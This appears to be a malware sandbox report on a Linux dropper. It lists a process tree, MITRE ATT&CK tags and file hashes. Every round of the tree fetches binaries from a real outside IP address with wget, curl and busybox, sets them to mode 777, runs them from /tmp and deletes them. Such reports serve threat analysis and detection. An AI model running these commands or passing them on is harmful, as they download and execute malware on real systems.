-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:934
-
-
/bin/chmodchmod 777 CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z./CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:940
-
-
/bin/chmodchmod 777 LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo./LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm LC8NmSgjAJpxvtaLyf6jv04anySund5Ivo2⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:946
-
-
/bin/chmodchmod 777 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/3L8OmStULKkoA3shg131n1guLCKtn5ohlb./3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 3L8OmStULKkoA3shg131n1guLCKtn5ohlb2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:952
-
-
/bin/chmodchmod 777 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI9./26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 26Y7bOYkYdRIHPq3w3HB5BPUyKvlRjuaI92⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:958
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:964
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:970
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97